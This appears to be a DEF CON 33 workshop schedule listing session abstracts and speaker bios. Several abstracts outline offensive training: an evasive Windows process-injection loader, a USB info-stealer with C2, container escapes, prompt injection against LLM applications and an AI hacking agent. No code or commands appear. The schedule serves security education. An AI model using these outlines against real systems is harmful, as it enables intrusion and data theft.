Creator: Red Team Village

[Overview]

Malware analysis often focuses on detonation, leaving new defenders and red‑teamers wondering how a loader is actually assembled. In this accelerated, beginner‑friendly, two‑hour hands‑on workshop, participants start with a ready‑to‑build Visual Studio solution and finish with a fully functional Windows 11 process‑injection loader written in C. We focus on the classic three‑call technique: VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, plus a quick single‑byte XOR obfuscation pass and file bloating operation. All workshop time is devoted to getting a working loader, testing it against Windows Defender, and understanding each step well enough that participants can expand beyond it.


[Course Outline]

  1. Environment Jump-Start
     0.1 Cover Windows 11 snapshot with tools and skeleton code.
     0.2 Confirm build of Loader.sln.

  2. Loader Fundamentals
     1.1 Loader vs payload overview
     1.2 Memory layout and why VirtualAllocEx / WriteProcessMemory / CreateRemoteThread works.

  3. Hands-On Build
     2.1 VirtualAllocEx – reserve RWX in target.
     2.2 WriteProcessMemory – copy shellcode.
     2.3 CreateRemoteThread – execute and watch notepad.exe execute.
     2.4 Breakpoint demo in x64dbg.

  4. Evasion
     3.1 Wrap shellcode in XOR decoder stub.
     3.2 Bloat file with appended null bytes.
     3.3 Show Defender detection before and after.

  5. Wrap-Up and Next Steps
     4.1 Provide code branches: indirect-syscalls, AMSI-bypass
     4.2 Safe research and legal reminders
     4.3 Recommended reading links


People:
    SpeakerBio:  Royce Yaezenko

Malware developer and vulnerability researcher with a focus on red team tooling. A purveyor of CTFs and watcher of shellcode pop, they enjoy crafting PoCs and designing CTF challenges for the community. Their current research explores Windows malware development, covert communication channels, and fuzzing techniques.




Bypassing Security Mechanisms Using Application Patching and Code Instrumentation

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C106 (Mobile Hacking Community)
When:  Friday, Aug 8, 16:00 – 16:59 PDT

Creator: Mobile Hacking Community

This session will walk you through bypassing mobile app security protections like root detection and SSL pinning using tools like Frida and apktool. It covers both static patching and dynamic code instrumentation to help you manipulate app behavior for testing and analysis.


People:
    SpeakerBio:  Grigoris Papoutsis, Senior Training Developer at Hack The Box

Grigoris is a Senior Training Developer at Hack The Box. He is passionate about Mobile Security and creating innovative content for cybersecurity Training. In addition to his role, Grigoris also teaches Mobile Application Security at the University of Piraeus. He graduated with an M.Sc. degree in Digital Systems Security, and he holds a B.Sc. in Computer Science with a specialization in Software Development. Grigoris has previously worked as a Penetration Tester, and he has been one of the founders and a core member of the cybersecurity research group INSSec at the University of West Attica since 2019.




Card testing workshop

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-505 (Payment Village)
When:  Friday, Aug 8, 10:30 – 10:59 PDT
Saturday, Aug 9, 10:30 – 10:59 PDT

Creator: Payment Village

People:
    SpeakerBio:  Vince Sloan
No BIO available



Ciphers & Cryptography – From Simple to Secure (Bradán Lane)

Creator Talk Map Page – LVCC West-Level 2-W230 (DC NextGen)
When:  Friday, Aug 8, 13:00 – 13:59 PDT

Creator: DC NextGen

(DCNextGen is for youth 8-18 attending DEF CON) Unlock hidden messages and become a Cipher Sleuth! This session steps through a series of ciphers, all based on strips of letters. Starting with ROT13, we progress through the Caesar cipher, the Vigenère cipher, and finally the US military’s competitor to the Enigma machine, the M138A. We exploit the weaknesses of early ciphers and see how to fix them, so your secret messages stay secret!


People:
    SpeakerBio:  Bradán Lane, Bradán Lane Studios

Bradán graduated third grade with a degree in crayon. This, combined with his unwavering belief in “how difficult could it be”, has made him eminently qualified to wash dishes. His background in UX Designer & User Research and as a purveyor of personas demonstrates his profound talent for making stuff up with confidence. Bradán pre-dates the internet and ARPANET.




How to Recover Data from a Destroyed Mobile Device (POR)

Creator Talk Map Page – LVCC West-Level 2-W220-W221 (La Villa Community)-Workshops
When:  Saturday, Aug 9, 14:00 – 15:59 PDT

Creator: La Villa

We will present forensic data recovery techniques for mobile devices, such as ISP and chip-off, along with electronic methods for accessing the data.


People:
    SpeakerBio:  Leandro Morales, Computer Forensic Expert, Digital Forensic Expert

Leandro Morales Baier Stefano is a digital forensics specialist with more than 20 years of experience. CEO of STWBrasil, he works in fraud investigation and cybersecurity, collaborating actively with public prosecutors' offices and specialized police units. He coordinates a private mobile data extraction laboratory and is a professor at Academia Forense Digital. He has training in information security and business administration and holds several postgraduate degrees in law and forensic sciences. Certified by companies such as Cellebrite and Cisco, he is a member of national and international forensic associations and has served as a court-appointed expert more than 200 times. He also supports the NGO Marias da Internet in fighting digital crimes against women.




Container Escapes 101

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-604 (AppSec Village)-Classroom
When:  Saturday, Aug 9, 13:15 – 15:15 PDT

Creator: AppSec Village

Containers aren’t tiny fortresses. They’re leaky rowboats unless you know what you’re doing. This hands-on workshop demystifies container security layer by layer, showing how real-world missteps in runtime, image, and host configurations open doors to escapes, persistence, and lateral movement. We’ll dissect how containers actually work, walk through common isolation failures, and demonstrate how attackers exploit weak assumptions. Whether you’re building, securing, or regulating containerized apps, you’ll leave with a threat model, practical tools, and maybe a new trick or two for literally popping out of the box.


People:
    SpeakerBio:  some-natalie

Natalie is a principal solutions engineer at Chainguard serving the public sector market. She spent years designing, building, and leading complex systems in regulated environments at a major systems integrator, but has also taken her career in many other directions – including detours into project management, systems engineering, and teaching.

She’s passionate about diversity in technology and empowering engineers to build better.




Context & Cringe: Bringing Privacy into Threat Modeling

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-604 (AppSec Village)-Classroom
When:  Friday, Aug 8, 10:15 – 12:15 PDT

Creator: AppSec Village

Privacy isn’t straightforward—yet it’s essential for systems and security. In this hands-on workshop, we’ll unpack the contextual layers of privacy through a gamified exercise to reveal the awkward realities of privacy choices. We’ll map key privacy threat categories with animal memes, explore lightweight threat modeling techniques for security and privacy, and apply these insights using the LINDDUN GO framework. You’ll leave with practical skills to tackle privacy risks head-on.


People:
    SpeakerBio:  AviD

AviD is a prominent security architect and developer, with decades of experience building secure products and protecting complex systems. He has been designing, developing, and testing secure applications for over 20 years, and is obsessed with maximizing value output from security efforts, threat modeling in particular.

At Bounce Security, Avi supports organizations of all sizes with incorporating security into their development workflows, often providing training on secure coding and other security topics. He is also a frequent speaker and trainer at security conferences and developer conferences, and has trained thousands of developers on security.

AviD is a member of the OWASP Board of Directors, a leader of the OWASP Israel chapter, and co-founded the OWASP Threat Modeling project. He is also a community moderator on https://Security.StackExchange.com/. Avi also co-authored the Threat Modeling Manifesto https://www.threatmodelingmanifesto.org/.

SpeakerBio:  Kim Wuyts

Dr. Kim Wuyts is a leading privacy engineer with over 15 years of experience in security and privacy. Before joining PwC Belgium as Manager Cyber & Privacy, Kim was a senior researcher at KU Leuven where she led the development and extension of LINDDUN, a popular privacy threat modeling framework. Her mission is to raise privacy awareness and get organizations to embrace privacy engineering best practices. She is a guest lecturer, experienced speaker, and invited keynote at international privacy and security conferences such as OWASP Global AppSec, RSA, Troopers, CPDP, and IAPP DPC. In the last few years, Kim has been delivering privacy awareness and privacy threat modeling training at many events, including academic guest lectures and corporate training.

Kim is also a co-author of the Threat Modeling Manifesto+Capabilities, program co-chair of the International Workshop on Privacy Engineering (IWPE), and a member of ENISA’s working group on Data Protection Engineering.




Cracking the Vault: Runtime API Testing in MDM-Locked Apps

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C106 (Mobile Hacking Community)
When:  Saturday, Aug 9, 10:15 – 11:15 PDT

Creator: Mobile Hacking Community

Mobile Device Management (MDM) is designed to harden enterprise devices, but what happens when security testing needs to inspect runtime behavior on these same locked devices? This workshop dives deep into bypassing typical MDM-imposed restrictions to perform dynamic runtime API testing on apps that rely heavily on MDM policies. We’ll dissect real-world use cases where traditional testing tools fail and walk through the Appknox approach for injecting custom instrumentation and intercepting APIs in live environments, without root, jailbreak, or MDM tampering. Attendees will learn practical methods to inspect API calls, simulate dynamic inputs, and reverse-engineer mobile apps at runtime, even when locked inside the MDM “vault.”


People:
    SpeakerBio:  Subho Halder, CEO & Co-Founder at Appknox

Subho Halder is the CEO and Co-founder of Appknox, a leading mobile application security platform trusted by 500+ global enterprises. A security researcher turned product leader, he previously worked with Hewlett-Packard and has been listed in Facebook, Google, and Twitter’s Hall of Fame for responsible vulnerability disclosures. Subho specializes in mobile app security, reverse engineering, and kernel exploitation. He has presented at Black Hat and OWASP amongst other industry leading events. At DEFCON, he’s bringing his deep expertise to explore what it takes to test apps on enterprise-locked devices, without breaking policy.

Subho Halder is the Co-founder and CEO of Appknox, where he leads advanced research in mobile application security.

He’s spent over a decade deep in offensive security, with a focus on mobile kernel exploitation, runtime evasion, and real-world bypasses for things like RASP and root detection. Subho has shared his work at top conferences including Black Hat, Nullcon, OWASP Global AppSec, and Syscan, often blending hardcore technical research with practical attack demos.

At Appknox, Subho has helped protect more than 500 enterprise apps by embedding mobile security into CI/CD workflows and using real-device testing over emulators. His work has been instrumental in helping organizations in fintech, retail, and aviation catch what traditional tools miss.

By day, he runs a fast-growing SaaS security company. By night, he’s still reverse engineering mobile stacks and building tools that push the boundaries of what’s possible in appsec.




Creating an AI Agent to Hack a Web Application

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 1
When:  Saturday, Aug 9, 11:00 – 11:50 PDT

Creator: Red Team Village

AI 🤖 is being discussed in pretty much all presentations out there. So, what is different about this session? This is a completely hands-on workshop where we will explore cutting edge agentic frameworks through the creation of an AI agent designed to hack web applications 🌐. You will learn how to develop a modular AI agent capable of performing reconnaissance, vulnerability scanning, and exploiting a web application. We will cover an overview of current AI techniques applicable to red team operations through live demonstrations and interactive exercises.

🚀 Join Omar Santos at DEF CON’s Red Team Village to explore how the fusion of AI and red teaming not only redefines the landscape of cyber offensive operations, but also sets the stage for pioneering defensive countermeasures.

🛡️ This workshop promises to equip you with both the knowledge and practical skills to leverage AI in red team operations.


People:
    SpeakerBio:  Omar Santos

Omar Santos is an active member of the security community, where he leads several industry-wide initiatives and standard bodies. Omar is a Distinguished Engineer at Cisco focusing on artificial intelligence (AI) security, cybersecurity research, incident response, and vulnerability disclosure. He is a board member of the OASIS Open standards organization and the founder of OpenEoX. Omar is the co-chair of the Coalition of Secure AI (CoSAI). Omar’s collaborative efforts extend to numerous organizations, including the Forum of Incident Response and Security Teams (FIRST) and the Industry Consortium for Advancement of Security on the Internet (ICASI). Omar is the co-chair of the FIRST PSIRT Special Interest Group (SIG). Omar is the co-founder of the DEF CON Red Team Village and the chair of the Common Security Advisory Framework (CSAF) technical committee.

Omar is the author of over 25 books, 21 video courses, and over 50 academic research papers. Omar is a renowned expert in ethical hacking, vulnerability research, incident response, and AI security. He employs his deep understanding of these disciplines to help organizations stay ahead of emerging threats. His dedication to cybersecurity has made a significant impact on technology standards, businesses, academic institutions, government agencies, and other entities striving to improve their cybersecurity programs. Prior to Cisco, Omar served in the United States Marines focusing on the deployment, testing, and maintenance of Command, Control, Communications, Computer and Intelligence (C4I) systems.




Crisis in La Villa: Incident Response Simulation (ESP-ENG)

Creator Talk Map Page – LVCC West-Level 2-W220-W221 (La Villa Community)-Workshops
When:  Saturday, Aug 9, 10:30 – 12:59 PDT

Creator: La Villa

This collaborative tabletop-style exercise offers a controlled, guided experience for understanding and working through the development of a cyber incident. To do this, we recreate a crisis scenario step by step, giving teams room to explore the best options. Exercises of this kind, when used together with a methodology, aim to evaluate, identify areas for improvement, and develop action plans to improve incident response capabilities.

No specific technical knowledge is required to participate; the audience is expected to include professionals with diverse profiles in cybersecurity and information security.

Characteristics:

  • Event-driven development: The crisis will unfold through a series of unexpected events and pieces of fragmented information. Participants will have to gather data, analyze the situation, and decide before proceeding.
  • Teamwork: Attendees will be part of teams, replicating the need for collaboration between different roles and areas to address a complex situation. Communication and coordination will be fundamental.
  • Prioritized decisions: Each choice will have direct consequences that can change the outcome of the situation. The goal is to avoid a catastrophe by making feasible decisions with the information available at each moment.
  • Hands-on learning: This activity aims to create an experience that serves as a basis for learning. It is an opportunity to test problem-solving skills, leadership, and understanding in a controlled environment.

The facilitators have run countless tabletop exercises (TTX) over the last 6 years in various countries in Latin America and the United States. In addition, they have carried out several research efforts published in academic papers, including a methodology, a platform to automate runs, and a model for applying TTXs to IR capability maturity (see publications on their LinkedIn profiles). They have also taught TTX exercise design workshops, including one for the FIRST.org community. Additionally, they ran an activity similar to the one proposed here at the Ekoparty 2024 conference. Beyond the exercise itself, the aim is to share a combination of industry best practices and experience in running this type of exercise.


People:
    SpeakerBio:  Fede Pacheco, Cybersecurity Services Director, BASE4 Security

Cybersecurity professional with a background in electronic engineering and several industry-recognized certifications. 20+ years of teaching experience at the most prestigious universities in Argentina. 4 published books and +15 peer-reviewed research papers. Has worked in the public and private sectors, including regional roles in global companies.

SpeakerBio:  Diego Staino, R&D+i Manager, BASE4 Security

Cybersecurity professional with 14+ years of experience as Security and IT consultant. Certified Incident Handler (ECIH) with a degree in Information Security and Communications. Currently works as R&D+i Manager at BASE4 Security, where he leads the company’s research and development initiatives.




Cryptocurrency Enforcement Actions

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C101 (Cryptocurrency Community)
When:  Friday, Aug 8, 10:00 – 10:50 PDT

Creator: Cryptocurrency Community

Multiple agencies have attempted to regulate cryptocurrencies through various means. This workshop will begin with a short presentation about the different organizations with an interest in regulating cryptocurrency (SEC, CFTC, IRS, and DOJ) and provide examples of enforcement actions. Next, participants will break out into discussion groups to consider the pros and cons of regulation by enforcement. Then, participants will be given a hypothetical cryptocurrency and be assigned a role either as a ‘regulator’ or as a ‘developer.’ The participants will engage in a settlement type discussion to determine if the cryptocurrency should be regulated under one agency, multiple agencies, or not at all.


People:
    SpeakerBio:  Veronika
No BIO available
SpeakerBio:  Chelsea Button, Cryptocurrency Education Initiative

Chelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.




Cryptocurrency Nodes and Relays

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C101 (Cryptocurrency Community)
When:  Saturday, Aug 9, 16:00 – 17:50 PDT

Creator: Cryptocurrency Community

Cryptocurrency nodes validate and relay transactions across the network. Like servers in a traditional financial system, nodes store a copy of the blockchain and enforce the network’s rules. Many of us want to run our own node for reasons of security, convenience, and independence from other people’s node configurations. Come to understand nodes, build your own, and explore configurations to test wallet applications on your new cryptocurrency node.


People:
    SpeakerBio:  Diego “rehrar” Salazar

Diego ‘rehrar’ Salazar has been around the FOSS and cryptocurrency communities for eight years. He owns and runs Cypher Stack, a company that performs novel research and makes contributions to various FOSS projects. He has organized and managed several villages at defcon, c3, and more.

SpeakerBio:  Dan
No BIO available



CYBERCLAW (CYBERsecurity Card-based Learning And Wargaming)

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-504 (Maritime Hacking Village)-Workshop Area
When:  Sunday, Aug 10, 10:00 – 11:30 PDT
Friday, Aug 8, 12:00 – 13:30 PDT
Saturday, Aug 9, 12:00 – 13:30 PDT

Creator: Maritime Hacking Village

No spoilers! Join us for a thrilling premiere of a DoD-designed wargame about undersea threats and cyber planning.


People:
    SpeakerBio:  Jared MacDonald, NUWC
No BIO available



Cyberjutsu Path to a Digital Martial Art

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-702 (Adversary Village)-Workshop Area
When:  Friday, Aug 8, 15:00 – 16:59 PDT

Creator: Adversary Village

Cyberjūtsu is a new way to teach cybersecurity inspired by martial arts training. It is an educational approach that allows everyone (novice to expert) to practice together and improve themselves in cybersecurity through confrontation. It follows budō (judo, jujitsu, karate…) principles and ethical code. The goal is to reach “maximum-efficient use of computer” for the “mutual benefit” of a human confrontation. It’s a digital martial art fight e-sport using the Linux shell.

Links:
    https://adversaryvillage.org/adversary-events/DEFCON-33/Alexandre-Cabrol-Perales/
    https://adversaryvillage.org/adversary-events/DEFCON-33/Alaric-Becker/

People:
    SpeakerBio:  Alexandre Cabrol-Perales, President of NPO Multi-country WOCSA, Teach at French University Cybersecurity Master, Head of Sopra Steria Cybersecurity Detection & Response Services

President of WOCSA France, Cyberjutsu Project Leader for WOCSA. Head of Managed Detection and Response Services at Sopra Steria Cybersecurity. External Professor at Cybersecurity Master (SSIR) for Science University of Toulouse, France. 1st dan Judo Jujitsu

SpeakerBio:  Alaric Becker, SOC Analyst and Threat Hunter at Sopra Steria

WOCS’HACK Project Leader for WOCSA France. Detection Analyst and Threat Hunter at Sopra Steria Cybersecurity. 3rd dan Judo Jujitsu




Don the Mantle: Red Team Campaign Planning and Execution with MITRE ATT&CK

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 1
When:  Saturday, Aug 9, 16:00 – 16:50 PDT

Creator: Red Team Village

This workshop will provide participants with the necessary knowledge to plan and execute red team exercises that accurately emulate real-world threat actors. Using MITRE ATT&CK as a foundation, attendees will learn how to map adversary tactics, techniques, and procedures (TTPs) to red team operations, ensuring realism down to the indicator of compromise (IOC) level. The workshop culminates with the hands-on development of a red team campaign to emulate an advanced persistent threat (APT) group. For this exercise, participants will receive simulated exercise objectives and rules of engagement and will use presented techniques to develop a basic red team campaign plan for successfully emulating the selected threat group.


People:
    SpeakerBio:  William Giles

William (Billy) Giles is an Offensive Security leader and practitioner who specializes in red/purple teaming, adversary emulation, and network penetration testing. With a deep passion for understanding and simulating adversary behaviors, he helps organizations across a multitude of industries assess their security postures, identify and remediate vulnerabilities, and build stronger defenses by thinking like an attacker.




Don’t be LLaMe – The basics of attacking LLMs in your Red Team exercises

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 2
When:  Friday, Aug 8, 12:00 – 12:50 PDT

Creator: Red Team Village

While there is increasing content on attacking LLMs hitting the Internet (and at DEFCON), much of it is focused on attacking LLMs from more of a penetration-test perspective without putting the attacks into the broader context of a Red Team operation. As with any technology that we encounter in a network during a Red Team exercise, we should be familiar with how to use it to achieve goals like lateral movement or privilege escalation. Like it or not, in the near future that will increasingly include LLM-based applications and agents.

This session aims to close that gap. The speakers will start with some entry-level theory on how LLMs function under the hood. No math experience? No problem. We’re going to keep things at a nice, high level with special focus on the core functionality of LLMs that enables attacks.

After addressing the theory, the speakers will shift to real-world attacks on LLMs drawn from our operations. This will take two forms: strategies to break LLMs through direct and indirect prompt injection, and ways to take a successful prompt injection and turn it into progress toward your Red Team objectives like enumeration, lateral movement, privilege escalation, or execution.

With the groundwork laid, the workshop will close with a hands-on, multi-level CTF for participants to try some of the direct and indirect prompt injection strategies discussed in the workshop.

Detailed Agenda:

  1. Introductions (2 mins)
  2. Theory:
     a. Neural Networks (10 mins)
     b. LLMs (10 mins)
  3. Attack Strategies (15 mins)
     a. Direct prompt injection strategies + war stories
     b. Indirect prompt injection strategies + war stories
  4. Hands-on CTF (20 mins)
  5. Q&A (remainder)


People:
    SpeakerBio:  Alex Bernier

I love breaking applications and AI systems!

SpeakerBio:  Brent Harrell

Brent is the author of the Red Team Capability Maturity Model and has led and created Red Teams at multiple organizations. He’s now on the consulting side of Red Teaming and is one of the initial members of the company’s new AI Red Team focused on LLM-based applications. With a background in traditional AD operations, though, much of his focus of late has been on bridging the gap between attacking LLMs directly and using them as part of greater operations.




EDR in the Ether: Detecting Malware Where the Mobile Network Breathes

Creator Talk Map Page – LVCC West-Level 2-W224 (Telecom Village)
When:  Saturday, Aug 9, 15:40 – 16:40 PDT

Creator: Telecom Village

People:
    SpeakerBio:  Arvind Singh
No BIO available



EFF/Hackers.town RayHunter build clinic

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C102 (Hackers.town Community)
When:  Friday, Aug 8, 15:30 – 16:30 PDT

Creator: Hackers.town Community

Come out and build EFF’s Rayhunter! ($10 materials fee EFF Donation)




ELEMENTAL MOVING MEDITATION

Creator Talk Map Page – LVCC West-Level 2-W205 (The Diana Initiative Community)
When:  Sunday, Aug 10, 11:00 – 11:59 PDT

Creator: The Diana Initiative

Flow into the world of Tai Chi, where movement meets meditation. This ancient practice creates harmony between the mind and body and cultivates our inner chi or life force energy. The gentle movements with mindful breathwork relax the body, stretch the muscles and move energy improving strength, flexibility and balance. This mind-body practice also centers the mind, reduces stress and helps one to feel grounded and present.

During this moving meditation, we will connect with our inner nature, our community and the beautiful land that surrounds us calling in and moving through the 4 directions and elements of Air, Fire, Water and Earth.

This workshop is inclusive of all bodies. EveryBODY is Welcome here.


People:
    SpeakerBio:  Megan Allen

Hi, I’m Megan Allen.

My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness – honoring a person’s emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.

I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.

I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.

Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.




Emulating Embedded Devices

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-401 (Embedded Systems Village)
When:  Friday, Aug 8, 10:00 – 17:59 PDT
Sunday, Aug 10, 10:00 – 11:59 PDT
Saturday, Aug 9, 10:00 – 17:59 PDT

Creator: Embedded Systems Village

Hack your first embedded system! Sit down at our provided laptops and be guided through exploiting an IP camera, then learn how you can set up the emulated camera (and other devices) at home with Ludus!




EncryptedClientHelloWorld: TLSv1.3 ECH As A Covert C2 Channel

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 4
When:  Friday, Aug 8, 15:00 – 15:50 PDT

Creator: Red Team Village

This workshop will cover the fundamentals of Transport Layer Security (TLS) version 1.3, the latest Encrypted Client Hello (ECH) extension, and its application as a Command and Control (C2) technique to bypass network defenses.


People:
    SpeakerBio:  Jose Plascencia

Jose is an experienced Red Teamer who dabbles in system administration, reverse engineering, and coding with Rust.




Evolution and History of Drain and Approval Attacks

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C101 (Cryptocurrency Community)
When:  Friday, Aug 8, 14:00 – 15:50 PDT

Creator: Cryptocurrency Community

This interactive workshop explores the history and evolution of draining attacks across major blockchains such as Ethereum, Solana, and TON. Participants will witness live demonstrations of various draining techniques, from early ERC-20 approval abuse to sophisticated token spoofing. Learn to recognize, trace, and defend against these exploits while discussing popular laundering methods and current security measures. A final group challenge will involve tracking an attacker’s wallet and evaluating how to recover stolen funds.


People:
    SpeakerBio:  utvecklas

Utvecklas is a computer scientist and privacy advocate who has integrated cryptocurrency into online businesses since 2016. Over time, cryptocurrency itself became his primary interest. Outside of work, his research specializes in exploits — whether past, ongoing, or potential.

SpeakerBio:  George

George is a cryptocurrency enthusiast who has been actively involved in the space since 2018. With a focus on crypto marketing and security, he has successfully launched multiple projects aimed at improving both user adoption and safety. George is passionate about bridging the gap between complex technologies and mainstream audiences.




Following Threat Actors’ Rhythm — to Give Them More Blues

Creator Talk Map Page – LVCC West-Level 3-W322-W324 (Blacks In Cyber Village)
When:  Friday, Aug 8, 14:00 – 14:59 PDT

Creator: Blacks In Cyber Village

BIC works hard to give more bad days to bad actors. Luckily, threat actors move to a certain rhythm, and following it can be just what you need to give them more blues. This session will demonstrate Domain Intelligence Analysis, a newly discussed concept from our investigations team that equips the audience to efficiently use DNS artifacts to protect their organization. Whether preventing a potential threat or responding to an existing one, DNS can support specific actions that make achieving these goals easier.

Domain Intelligence Analysis informs incident response efforts and can shape detection engineering to identify and investigate threats earlier—when context is more valuable. These techniques will be supported with examples of domain and infrastructure discoveries made by our research team, some of which were featured in the 2025 Trends in Malicious Infrastructure report, created with support from two Black practitioners. These examples show how quickly domains can be discovered before they become public IOCs.

Join this presentation to identify relevant IOCs faster and enable more informed, timely investigations into cybercrime.


People:
    SpeakerBio:  Malachi Walker

Malachi Walker, DomainTools Security Advisor, has experience in information security, from DNS to crime and conflict in cyberspace to cybersecurity governance and cybersecurity program and design. At DomainTools, he applies this background to help organizations understand the threat landscape, especially in the area of malicious online infrastructure through advocacy of the company’s growing portfolio of investigative and proactive cyber defense offerings. Prior to DomainTools, he worked in FTI Consulting’s Cybersecurity practice and led product and brand protection efforts at WhiteHawk Inc. Malachi earned his Master’s with a concentration in Cybersecurity Management at Virginia Polytechnic Institute and State University.




Frida for reverse engineering payment applications

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-505 (Payment Village)
When:  Saturday, Aug 9, 11:00 – 11:59 PDT

Creator: Payment Village

People:
    SpeakerBio:  Ileana Barrionuevo
No BIO available



From Code to Control: Embedded System Design vs. Traditional Software Design

Creator Talk Map Page – LVCC West-Level 3-W322-W324 (Blacks In Cyber Village)
When:  Saturday, Aug 9, 14:00 – 14:59 PDT

Creator: Blacks In Cyber Village

Designing embedded systems requires more than just writing software—it demands a new way of thinking. This talk introduces key concepts that set embedded design apart from traditional software development. We’ll explore microcontrollers vs. microprocessors, bare-metal programming vs. using an operating system, controlling peripherals through registers, handling interrupts, communication protocols, and embedded debugging techniques. Whether you’re a curious developer or diving into hardware for the first time, this session will give you the foundation to build complex embedded systems with confidence.


People:
    SpeakerBio:  Ian G. Harris

Dr. Ian Harris is a Professor of Computer Science at the University of California, Irvine, where he conducts research at the intersection of hardware security and natural language processing. His work spans secure system design, information flow tracking, and the development of NLP tools for cybersecurity applications. Dr. Harris is also an experienced educator, teaching courses in embedded system design both on campus and online through Coursera, where he reaches a global audience of learners. With a strong background in computer architecture and verification, he is committed to advancing secure and intelligent computing systems through both innovative research and accessible education.




From Component to Compromised: XSS via React createElement

Creator Talk Map Page – LVCC West-Level 3-W326 (Bug Bounty Village)
When:  Saturday, Aug 9, 12:00 – 12:59 PDT

Creator: Bug Bounty Village

XSS in modern React apps isn’t gone, it’s just hiding in new places. In this workshop, we’ll expose how React createElement can be your way in. We’ll walk through several React DOM XSS lab scenarios based on real bug bounty findings from vulnerable applications in the wild. You’ll see how untrusted input can make its way from a variety of realistic sources to a React createElement sink, leading to exploitable XSS, even in apps built with frameworks like Next.js. These labs are realistic, grounded in actual bugs, and designed to sharpen your ability to spot and exploit DOM XSS in the kinds of apps bounty hunters hit every day.


People:
    SpeakerBio:  Nick Copi

Nick Copi is an AppSec engineer and active bug bounty hunter who regularly submits high signal findings to notable companies. He has a diverse technical background, including building and hosting infrastructure and challenges for a couple dozen capture the flag or other offensive hands-on training lab events. He is a member of the CTBB Full Time Hunter’s Guild, and an active contributor to the online bug bounty space, always eager to share interesting ideas around other people’s “nearly exploitable bugs” as well as novel attack scenarios. His hobbies include debugging minified JavaScript, grepping Blink source in hopes of discovering magical undocumented behaviors, and doing pull ups on iframe jungle gyms.




From Intel to Emulation: Turning Threat Actor Trends into Defensive Muscle

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-702 (Adversary Village)-Workshop Area
When:  Friday, Aug 8, 11:00 – 12:59 PDT

Creator: Adversary Village

This hands-on workshop teaches you how to track current threat actor activity, build emulation plans from real-world intelligence, and test them safely to improve your organization’s defenses. You’ll learn how to gather and interpret TTPs using open-source tools like VirusTotal, ANY.RUN, and MalwareBazaar, then turn that into executable emulation using tools like CALDERA or Atomic Red Team. We’ll finish by analyzing your test results and identifying where your detections and policies may fall short.

Links:
    adversaryvillage.org/adversary-events/DEFCON-33/Roxey-Davis/ – https://adversaryvillage.org/adversary-events/DEFCON-33/Roxey-Davis/

People:
    SpeakerBio:  Roxey Davis, Cybersecurity Storyteller | COO, Women’s Society of Cyberjutsu | GRC Security Analyst | Threat Intel Enthusiast & Inclusive Defense Advocate

Roxey Davis is a passionate cybersecurity leader, storyteller, and advocate for inclusive defense. With a background in Security Operations, Threat Intelligence, and Governance, Risk, and Compliance (GRC), they specialize in turning complex threats into collaborative learning opportunities for all skill levels. Currently serving as a GRC Security Analyst and the Chief Operating Officer of the Women’s Society of Cyberjutsu, Roxey helps create spaces where underrepresented voices can lead, learn, and thrive.

Their work bridges technical expertise with empathy-driven strategy, focusing on threat-informed defense, insider risk, and building communities where defenders support each other like a well-formed pack. Whether coordinating purple team exercises, launching mentorship programs, or gamifying security awareness, Roxey believes cybersecurity isn’t just about tools — it’s about people, purpose, and preparing before the full moon rises. They’ve spoken at BsidesNOLA and are known for their creative, interactive sessions that blend storytelling, threat models, and the occasional supernatural metaphor.




From Prey to Playbook: Learning about victim behavior from infostealer logs

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 1
When:  Saturday, Aug 9, 15:00 – 15:50 PDT

Creator: Red Team Village

In this hands-on workshop, participants will analyze anonymized infostealer logs to uncover the human vulnerabilities that make these attacks successful. Using privacy-preserved datasets, attendees will reverse-engineer victim decision patterns, identify high-value behavioral triggers, and craft precision-targeted attack sequences based on real-world data.


People:
    SpeakerBio:  Megan Squire

Dr. Megan Squire is a researcher in cyber threat intelligence at F-Secure, a consumer-facing cybersecurity software company that focuses on scam protection. Her work tracing illicit finance and extremist influence networks has been featured in hundreds of publications including WIRED, the BBC, NPR, and Frontline.




From USB to C2

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 2
When:  Friday, Aug 8, 15:00 – 15:50 PDT

Creator: Red Team Village

In this workshop, participants will build and deploy a USB-based intrusion framework: crafting a malicious USB payload, developing a lightweight information-stealing stager, and using the resulting data to deploy a Mythic C2 beacon. The session also covers provisioning and configuring an AWS-hosted command-and-control environment. Attendees will leave with hands-on experience in both the offensive implant and its supporting cloud infrastructure.


People:
